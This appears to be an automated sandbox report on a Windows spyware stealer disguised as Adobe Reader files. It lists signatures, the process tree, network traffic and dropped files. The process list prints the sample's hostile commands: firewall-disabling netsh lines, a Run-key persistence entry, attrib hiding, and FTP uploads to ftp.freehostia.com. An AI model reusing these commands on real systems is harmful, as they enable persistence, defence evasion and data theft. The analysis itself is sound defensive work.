Reads local data of messenger clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lodhgyuuuf = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\aijw01.bat" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\BReader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ipconfig.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe N/A
Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6} C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\ = "EAPSIM Identity Task class" C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32 C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32\ = "%systemroot%\\SysWow64\\eapsimextdesktop.dll" C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2596 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2596 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2596 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1256 wrote to memory of 1180 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1180 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1256 wrote to memory of 1180 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1180 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 1180 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 1180 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 1180 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 3648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 3648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 3648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 4684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1180 wrote to memory of 3496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 1180 wrote to memory of 3496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 1180 wrote to memory of 3496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 3496 wrote to memory of 2428 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2428 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2428 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2428 wrote to memory of 3940 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 2428 wrote to memory of 3940 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 2428 wrote to memory of 3940 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
PID 2428 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2428 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2428 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2428 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2428 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2428 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2428 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 2428 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 2428 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
PID 1064 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat" /quiet /norestart"

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"

C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\RAdobe\RADBR\AREADER"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\nimiki09.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\enikiol03.bat" /quiet /norestart"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe

Adobeta.exe -x -x -x -d -nuttyhdff -s:nuttyhdff.nuttyhdff ftp.freehostia.com -nuttyhdff

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lodhgyuuuf" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\aijw01.bat"

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /all

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe

adbr01.exe -f "011.011"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe

adbr01.exe -f "011.011"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe

adbr02.exe -f "112.112"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe

adbr02.exe -f "112.112"

C:\Windows\SysWOW64\netsh.exe

netsh firewall set opmode disable

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set profiles state off

C:\Windows\SysWOW64\netsh.exe

NetSh Advfirewall set allprofiles state off

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe

Adobeta.exe -a -c -d -natpasv -s:870.afr ftp.freehostia.com

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe

Adobeta.exe -a -c -d -natpasv -s:sun.afr ftp.freehostia.com

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\BReader.exe

BReader 5359

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 ftp.freehostia.com udp
US 198.23.57.8:21 ftp.freehostia.com tcp
US 198.23.57.8:21 ftp.freehostia.com tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\adbr01.ght

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\adbr02.ght

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\aijw01.bat

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\Adobeta.exe

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\870.afr

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\BReader.exe

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\sun.afr

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\nimiki09.vbs

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol03.bat

C:\ProgramData\TEMP\RAIDTest

C:\Users\Admin\AppData\Local\Temp\9F86B0A0.TMP

C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\011.011

C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\112.112
